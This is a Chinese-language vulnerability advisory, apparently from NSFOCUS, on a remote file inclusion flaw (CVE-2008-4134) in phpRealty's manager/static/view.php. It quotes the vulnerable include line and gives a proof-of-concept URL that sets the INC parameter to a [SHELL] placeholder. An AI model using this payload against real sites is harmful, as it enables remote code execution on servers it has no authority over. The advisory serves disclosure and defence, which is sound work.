安全研究
安全漏洞
phpRealty view.php远程文件包含漏洞
发布日期:2008-09-17
更新日期:2008-09-23
受影响系统:phpRealty Software phpRealty <= 0.03
描述:
BUGTRAQ ID:
31213
CVE(CAN) ID:
CVE-2008-4134
phpRealty是基于PHP/MYSQL的内容管理软件。
phpRealty的manager/static/view.php文件中没有正确地过滤INC参数,远程攻击者可以通过包括本地或远程资源导致执行任意代码。
相关的代码如下:
11: if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){
13: return;
17: include($INC."curr_conv.class.php"); // -------->>> Vuln Line!!
// the var $INC isn't declared
<*来源:ka0x (
ka0x01@gmail.com)
链接:
http://www.milw0rm.com/exploits/6473
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC=[SHELL]?
建议:
厂商补丁:
phpRealty Software
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://php-realty.com/home.html浏览次数:2346
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |